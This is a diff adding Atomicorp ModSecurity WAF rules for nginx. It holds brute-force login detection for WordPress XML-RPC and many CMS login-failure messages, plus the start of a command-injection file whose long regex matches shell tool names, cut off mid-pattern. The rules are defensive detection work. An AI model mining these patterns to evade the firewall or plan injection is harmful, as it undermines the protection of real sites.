+SecRule REQUEST_BODY|XML:/* "(?:wp|blogger|m(?:w|t))\.(?:(?:g|s)et|new|edit|delete|suggest).*(?:wp|blogger|m(?:w|t))\.(?:(?:g|s)et|new|edit|delete|suggest).*(?:wp|blogger|m(?:w|t))\.(?:(?:g|s)et|new|edit|delete|suggest)" "phase:2,t:none,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules - Bruteforce Login Failure Detection: WordPress Multiple Simultaneous Login Attempt Failure ',id:'377609',rev:4,severity:'2'"
+
+SecRule REQUEST_URI "^/xmlrpc.php\?for=jetpack" "phase:2,id:323338,t:none,t:lowercase,pass,log,skipAfter:END_XMLRPC_BRUTE_2"
+
+SecRule REQUEST_BODY|XML:/* "system\.multicall" "phase:2,t:none,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules - Bruteforce Login Failure Detection: WordPress Multiple Simultaneous Login Attempt Failure ',id:'377619',rev:2,severity:'2'"
+#wp.getUsersBlogs, wp.newPost, wp.editPost, wp.deletePost, wp.getPost, wp.getPosts, wp.newTerm, wp.editTerm, wp.deleteTerm, wp.getTerm, wp.getTerms, wp.getTaxonomy, wp.getTaxonomies, wp.getUser, wp.getUsers, wp.getProfile, wp.editProfile, wp.getPage, wp.getPages, wp.newPage, wp.deletePage, wp.editPage, wp.getPageList, wp.getAuthors, wp.getTags, wp.newCategory, wp.deleteCategory, wp.suggestCategories, wp.getComment, wp.getComments, wp.deleteComment, wp.editComment, wp.newComment, wp.getCommentStatusList, wp.getCommentCount, wp.getPostStatusList, wp.getPageStatusList, wp.getPageTemplates, wp.getOptions, wp.setOptions, wp.getMediaItem, wp.getMediaLibrary, wp.getPostFormats, wp.getPostType, wp.getPostTypes, wp.getRevisions, wp.restoreRevision, blogger.getUsersBlogs, blogger.getUserInfo, blogger.getPost, blogger.getRecentPosts, blogger.newPost, blogger.editPost, blogger.deletePost, mw.newPost, mw.editPost, mw.getPost, mw.getRecentPosts, mw.getCategories, mw.newMediaObject, mt.getRecentPostTitles, mt.getPostCategories, mt.setPostCategories
+#
+SecMarker END_XMLRPC_BRUTE_2
+
+SecRule XML:/* "wp\.getUserBlogs.{,400}wp\.getUserBlogs.{,400}wp\.getUserBlogs"  "phase:2,t:none,auditlog,deny,log,status:403,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Multiple Wordpress Login Attempt Failure ',id:'377368',rev:2,severity:'2'"
+
+SecRule XML:/* "(?:wp\.getusersblogs|system\.multicall)" "phase:2,chain,t:none,t:lowercase,auditlog,deny,log,status:403,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Multiple Wordpress Login Attempt Failure ',id:'377367',rev:2,severity:'2'"
+SecRule XML:/* "params"  "t:none,t:lowercase,chain"
+SecRule XML:/* "(?:admin.{,400}admin|string.{,200}string.{,200}string.{,200}string)" "t:none,t:lowercase"
+
+SecMarker END_XMLRPC_BRUTE_1
+
+SecRule SERVER_PORT "@streq 30000" "phase:4,id:339854,pass,t:none,nolog,noauditlog,skipAfter:END_BRUTE_OUT_1"
+
+
+SecRule RESPONSE_BODY "@pm incorrect passwort password wrong match valid unrecognized succeed re-type error sorry, messagestackerror error-msg blank usuario isadmin" 	"phase:4,id:333862,pass,t:none,nolog,noauditlog,skip:1"
+SecAction "phase:4,id:333318,t:none,pass,nolog,noauditlog,skipAfter:END_BRUTE_OUT"
+
+#Login Details Incorrect. Please try again.
+SecRule RESPONSE_BODY "<p>Login Details Incorrect\. Please try again\."         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: WHMCS login failure',id:'378410',rev:1,severity:'4',tag:'no_ar'"
+
+#Recaptcha invalid response
+# <td class="row3" colspan="2" align="center"><span class="gensmall error">The visual confirmation code you submitted was incorrect</span></td>
+#phpbb login failure
+SecRule RESPONSE_BODY ">The visual confirmation code you submitted was incorrect</span>"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Recaptcha invalid code',id:'377410',rev:1,severity:'4',tag:'no_ar'"
+
+
+#phpbb login failure
+SecRule RESPONSE_BODY "You have entered an invalid username or password\. Please enter the correct details and"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: VBulletin Login Attempt Failure ',id:'377300',rev:1,severity:'4',tag:'no_ar'"
+
+#377301
+#phpbb login failure
+#You have specified an incorrect password. Please check your password and try again.
+SecRule RESPONSE_BODY "You have specified an incorrect password\. Please check your password and try again\."          "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: PHPBB Login Attempt Failure ',id:'377301',rev:1,severity:'4',tag:'no_ar'"
+
+#mediawiki
+#Incorrect password entered. Please try again
+SecRule RESPONSE_BODY "Incorrect password entered\. Please try again\."         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Wikimedia Login Attempt Failure ',id:'377302',rev:1,severity:'4',tag:'no_ar'"
+
+#sugarcrm
+SecRule RESPONSE_BODY "You must specify a valid username and password\."         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Sugarcrm Administration system Login Attempt Failure ',id:'377303',rev:1,severity:'4',tag:'no_ar'"
+
+#joomla
+#Use a valid username and password to gain access to the Administrator Back-end
+SecRule RESPONSE_BODY "(?:<li>Username and password do not match|Use a valid username and password to gain access to the Administrator Back-end|Nombre de usuario y contraseña no encontrados|Usuario no existe|Benutzername und Passwort falsch oder das Benutzerkonto existiert noch nicht)"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Joomla Administration Login Attempt Failure ',id:'377304',rev:5,severity:'4',tag:'no_ar'"
+
+#wordpress
+#<div id="login_error">	<strong>ERROR</strong>: The password you entered for the username <strong>admin</strong> is incorrect. <a href="http://server2/wordpress/wp-login.php?action=lostpassword" title="Password Lost and Found">Lost your password</a>?<br />
+SecRule RESPONSE_BODY "<strong>E(?:rror|RROR)</strong>\: The password you entered for the username"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: WordPress Login Attempt Failure ',id:'377305',rev:2,severity:'4',tag:'no_ar'"
+
+#Newer versions of WP
+SecRule RESPONSE_BODY "<strong>E(?:rror|RROR)</strong>\: Incorrect password"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: WordPress Login Attempt Failure ',id:'377605',rev:2,severity:'4',tag:'no_ar'"
+
+#Multiple WP xmlrpc brute force
+SecRule RESPONSE_BODY|XML:/* "faultString.{,32}Incorrect username or password.{,100}faultString.{,32}Incorrect username or password.{,100}faultString.{,32}Incorrect username or password"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,deny,status:403,msg:'Atomicorp.com WAF Rules - Login Failure Detection: WordPress Multiple Simultaneous Login Attempt Failure ',id:'377679',rev:2,severity:'2'"
+
+SecRule RESPONSE_BODY|XML:/* "isAdmin.{,100}boolean.{,100}isAdmin.{,100}boolean.{,100}isAdmin.{,100}boolean"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,deny,status:403,msg:'Atomicorp.com WAF Rules - Login Failure Detection: WordPress Multiple Simultaneous Login Attempt Failure ',id:'377689',rev:2,severity:'2'"
+
+#Newer versions of WP XMLRPC API
+SecRule RESPONSE_BODY|XML:/* "(?:<string>|faultString.{,128})Incorrect username or password"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: WordPress Login Attempt Failure ',id:'377625',rev:3,severity:'4',tag:'no_ar'"
+#Newer versions of WP XMLRPC API
+SecRule RESPONSE_BODY "<string>server error. requested method wp\."         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules: Potential WordPress Method Probe Detected ',id:'377626',rev:3,severity:'4',tag:'no_ar'"
+
+
+
+#wordpress
+#<div id="login_error">	<strong>ERROR</strong>: Invalid username. <a href="http://server2/wordpress/wp-login.php?action=lostpassword" title="Password Lost and Found">Lost your password</a>?<br />
+SecRule RESPONSE_BODY "<strong>E(?:rror|RROR)</strong>: (?:Invalid|Unknown) username"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Wordpress invalid username failure ',id:'377306',rev:2,severity:'4',tag:'no_ar'"
+
+#Drupal
+SecRule RESPONSE_BODY "Sorry, unrecognized username or password"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Drupal invalid username or password failure ',id:'377308',rev:2,severity:'4',tag:'no_ar'"
+
+#typo3
+#<h2>Your login attempt did not succeed</h2>
+#	<p>Make sure to spell your username and password correctly, including upper/lowercase characters.</p>
+SecRule RESPONSE_BODY "<h2>Your login attempt did not succeed</h2>"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Typo3 invalid username or password failure ',id:'377309',rev:1,severity:'4',tag:'no_ar'"
+
+#modx
+#    <p class="error">That account could not be located.  Check the username and re-type the password to try again.</p>    </div></div></div>
+SecRule RESPONSE_BODY ">That account could not be located\.  Check the username and re-type the password to try again\.</p>"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: MODX invalid username failure ',id:'377310',rev:1,severity:'4',tag:'no_ar'"
+
+#    <p class="error">The username or password you entered is incorrect.  Please check the username, re-type the password, and try again.</p>    </div></div></div>
+SecRule RESPONSE_BODY "The username or password you entered is incorrect\.  Please check the username"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: MODX password login failure ',id:'377311',rev:1,severity:'4',tag:'no_ar'"
+
+#moodle
+#        <div class="loginerrors"><span class="error">Invalid login, please try again</span></div>        <form action="http://server2/moodle/login/index.php" method="post" id="login"  >
+SecRule RESPONSE_BODY ">Invalid login, please try again</span></div>"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Moodle login failure ',id:'377312',rev:1,severity:'4',tag:'no_ar'"
+
+#Plesk
+#</SPAN>You have entered incorrect username or password.</DIV>
+SecRule RESPONSE_BODY "</SPAN>You have entered incorrect username or password\.</DIV>"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Plesk login failure ',id:'377313',rev:1,severity:'4',tag:'no_ar'"
+
+#oscommerce customer login
+#Error: No match for E-Mail Address and/or Password.</td>
+SecRule RESPONSE_BODY "Error\: No match for E-Mail Address and/or Password\.</td>"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Oscommerce customer login failure ',id:'377314',rev:1,severity:'4',tag:'no_ar'"
+
+#oscommerce admin login
+SecRule RESPONSE_BODY "(?:Error\: Identification of the store administrator failed\.|Invalid administrator login attempt\.)"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Oscommerce admin login failure ',id:'377315',rev:2,severity:'4',tag:'no_ar'"
+
+#zencart customer login
+#Error: Sorry, there is no match for that email address and/or password.</
+SecRule RESPONSE_BODY "Error\: Sorry, there is no match for that email address and/or password\.</"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: ZenCart customer login failure ',id:'377323',rev:1,severity:'4',tag:'no_ar'"
+
+#zencart admin login
+#messageStackError">You entered the wrong username or password.
+SecRule RESPONSE_BODY "messageStackError\">You entered the wrong username or password\."         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: ZenCart admin login failure ',id:'377316',rev:1,severity:'4',tag:'no_ar'"
+
+#dokuwiki
+# <div class="error">Sorry, username or password was wrong.</div>
+SecRule RESPONSE_BODY "<div class=\"error\">Sorry, username or password was wrong\."         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Dokuwiki login failure ',id:'377317',rev:1,severity:'4',tag:'no_ar'"
+# magento customer
+# Please enter a valid email address. For example johndoe@domain.com.
+#SecRule RESPONSE_BODY "Please enter a valid email address\. For example johndoe@domain.com\." #        "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Magento customer login failure ',id:'377318',rev:1,severity:'4'"
+# magento admin
+# <li class="error-msg"><ul><li><span>Invalid Username or Password.</span>
+SecRule RESPONSE_BODY "<li class=\"error-msg\"><ul><li><span>Invalid Username or Password\.</span>"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Magento admin login failure ',id:'377319',rev:1,severity:'4',tag:'no_ar'"
+# prestashop invalid password
+# <li>Invalid password</li>
+SecRule RESPONSE_BODY "<li>Invalid password</li>"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Prestashop login failure (invalid password)',id:'377320',rev:1,severity:'4',tag:'no_ar'"
+# prestashop invalid email
+# 		<ol style="margin: 0 0 0 20px;"><li>Employee does not exist or password is incorrect.</li>
+SecRule RESPONSE_BODY "<li>Employee does not exist or password is incorrect\.</li>"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Prestashop login failure (invalid email)',id:'377321',rev:1,severity:'4',tag:'no_ar'"
+# prestashop  blank password
+# 		<ol style="margin: 0 0 0 20px;"><li>Password is blank</li>
+SecRule RESPONSE_BODY "<li>Password is blank</li>"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Prestashop login failure (blank password)',id:'377322',rev:1,severity:'4',tag:'no_ar'"
+
+#phpbb login failure
+#You have specified an incorrect password. Please check your password and try again.
+SecRule RESPONSE_BODY "You have specified an incorrect username\. Please check your username and try again\."          "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: PHPBB Login Attempt Failure - Incorrect Username ',id:'377326',rev:1,severity:'4',tag:'no_ar'"
+
+#377324 is next
+SecMarker END_BRUTE_OUT_1
+
+#ASL bruteforce
+SecRule RESPONSE_BODY "(?:<span class=\'text_red\'>Invalid username or password</span>|class=\"td_login_fail\">Invalid username or password</td>)"         "phase:4,t:none,log,auditlog,ctl:auditLogParts=+E,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: ASL GUI invalid username or password failure ',id:'377307',rev:3,severity:'4',tag:'no_ar'"
+
+
+SecRule REQUEST_URI "^/login/\?login_only=1" "t:none,t:urlDecodeUni,t:lowercase,phase:5,id:335897,pass,nolog,noauditlog,skip:1"
+SecAction "phase:5,id:333319,t:none,pass,nolog,noauditlog,skipAfter:END_BRUTE_OUT"
+
+#Cpanel
+SecRule REQUEST_METHOD "@streq POST" "phase:5,chain,t:none,auditlog,pass,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Cpanel WHM Login Attempt Failure ',id:'377363',rev:2,severity:'4',tag:'no_ar'"
+SecRule REQUEST_URI "^/login/\?login_only=1" "chain,t:none,t:urlDecodeUni,t:lowercase"
+SecRule RESPONSE_STATUS "401"  "t:none"
+
+#successful cpanel root login
+SecRule REQUEST_METHOD "@streq POST" "phase:5,chain,t:none,auditlog,pass,msg:'Atomicorp.com WAF Rules - Login Detection: Cpanel WHM root Login succeeded ',id:'377364',rev:2,severity:'5',tag:'no_ar'"
+SecRule REQUEST_URI "^/login/\?login_only=1" "chain,t:none,t:urlDecodeUni,t:lowercase"
+SecRule ARGS:user "root" "chain,t:none,t:urlDecodeUni,t:lowercase"
+SecRule RESPONSE_STATUS "200"  "t:none"
+
+#SecRule REQUEST_FILENAME "/wp-login\.php" "chain,phase:4,severity:2,id:377365,t:none,t:lowercase,t:urlDecodeUni,deny,status:403,msg:'Atomicorp.com WAF Rules - Login Detection: Wordpress Admin Authentication Failure Violation.',logdata:'Number of Authentication Failures in 60 seconds: %{ip.failed_auth_attempt}'"
+#  SecRule REQUEST_METHOD "@streq POST" "t:none,chain"
+#    SecRule ARGS:log "admin" "chain,t:none,t:lowercase,t:urlDecodeUni"
+#      SecRule RESPONSE_STATUS "200" "chain,t:none"
+#        SecRule RESPONSE_BODY "@contains <strong>Error</strong>:Incorrect password." "chain,t:none,setvar:ip.failed_auth_attempt=+1,expirevar:ip.failed_auth_attempt=60"
+#          SecRule IP:FAILED_AUTH_ATTEMPT "@gt 5"
+#
+#SecRule REQUEST_FILENAME "/wp-login\.php" "chain,phase:4,severity:2,id:377366,t:none,t:lowercase,t:urlDecodeUni,deny,status:403,msg:'Atomicorp.com WAF Rules - Login Detection: Wordpress Authentication Failure Violation.',logdata:'Number of Authentication Failures in 60 seconds: %{ip.failed_auth_attempt} '"
+#  SecRule REQUEST_METHOD "@streq POST" "t:none,chain"
+#      SecRule RESPONSE_STATUS "200" "chain,t:none"
+#        SecRule RESPONSE_BODY "@contains <strong>Error</strong>:Incorrect password." "chain,t:none,setvar:ip.failed_auth_attempt=+1,expirevar:ip.failed_auth_attempt=60"
+#          SecRule IP:FAILED_AUTH_ATTEMPT "@gt 10"
+
+SecMarker END_BRUTE_OUT
+
+#Wordpress login probes
+SecRule REQUEST_URI "wp-login\.php"  "chain,phase:2,id:307367,severity:2,t:none,t:lowercase,t:urlDecodeUni,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules - Login Brute Force: Wordpress Authentication Probes detected .',logdata:'Number of probes in 60 seconds: %{ip.login_probe} '"
+  SecRule REQUEST_METHOD "@streq HEAD" "t:none,chain,setvar:ip.login_probe=+1,expirevar:ip.login_probe=60"
+          SecRule IP:LOGIN_PROBE "@gt 5"
+
+#cpanel login probes
+SecRule REQUEST_URI "(?:dologin|clientarea)\.php"  "chain,phase:2,severity:2,id:317368,t:none,t:lowercase,t:urlDecodeUni,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: WHMCS brute force probe blocked.'"
+  SecRule REQUEST_METHOD "@streq HEAD" "t:none"
+
+#Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
+#SecRule REQUEST_HEADERS:User-Agent "MSIE 7\.0" #"chain,phase:2,log,deny,auditlog,t:none,id:354322,rev:3,severity:4,msg:'Atomicorp.com WAF Rules: Cpanel brute force attack detected'"
+#SecRule REQUEST_URI "(?:dologin|clientarea)\.php" "t:none,t:lowercase"
diff --git a/nginx-waf/13_asl_brute_enhanced.conf b/nginx-waf/13_asl_brute_enhanced.conf
new file mode 100644
index 0000000..7ac1e58
--- /dev/null
+++ b/nginx-waf/13_asl_brute_enhanced.conf
@@ -0,0 +1,39 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.5+
+#
+# Created by Atomicorp (http://www.atomicorp.com)
+# Copyright 2005-2016 by Atomicorp, all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+#
+
+#Wordpress login probes
+SecRule REQUEST_FILENAME "/wp-login\.php" "chain,phase:2,severity:2,id:307368,t:none,t:lowercase,t:urlDecodeUni,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules - Login Brute Force: Possible Wordpress Authentication Probes detected .',logdata:'Number of probes in 60 seconds: %{ip.login_probe} '"
+  SecRule REQUEST_METHOD "@streq GET" "t:none,chain,setvar:ip.login_probe=+1,expirevar:ip.login_probe=60"
+          SecRule IP:LOGIN_PROBE "@gt 10"
diff --git a/nginx-waf/13_asl_command_injection.conf b/nginx-waf/13_asl_command_injection.conf
new file mode 100644
index 0000000..ead66d5
--- /dev/null
+++ b/nginx-waf/13_asl_command_injection.conf
@@ -0,0 +1,57 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.9.0 and up
+#
+# This file, 13_asl_command_injection.conf, is distributed under GPL version 3
+# http://www.gnu.org/licenses/gpl.txt
+
+#
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS   
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE   
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE   
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE   
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR   
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF   
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS   
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN   
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)   
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF   
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+SecRule REQUEST_METHOD "!(?:POST|GET)"   "phase:2,pass,t:none,rev:1,id:340949,nolog,noauditlog,skipAfter:END_DETECT_CMD_INJECT_ADV"
+
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:t[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?[ar])?|a[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:(?:[bt]|w[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?[ks])[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v<>].*|p[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?t|r[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:[\s\v<>].*|[jp])|s[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:[\s\v<>].*|h))|c[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:[8-9][\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?9|(?:[au][\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?t|[cp])[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v<>].*|m[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?p|s[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?h)|d[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:[du][\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v<>].*|i[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?g|n[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?f)|e[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:(?:[bdx]|n[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?v)[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v<>].*|q[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?n)|f[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:(?:c|t[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?p)[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v<>].*|i|m[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?t)|g[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:(?:c[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:[<>]|(?:[\--\.0-9A-Z_a-z][\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?)+[\s\v<>])|(?:e[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?m|i[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?t|o)[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v<>]).*|d[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?b|[hr][\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?c)|(?:(?:h[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:d|u[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?p)|n[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:[cl]|e[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?t|(?:p[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?)?m)|o[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?d|u[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?l)[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?|v[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:m[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?)?)[\s\v<>].*|i[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?(?:d[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v<>].*|p|r[\"'\[-\x5c]*(?:\$[!#\*\-0-9\?-@_a-\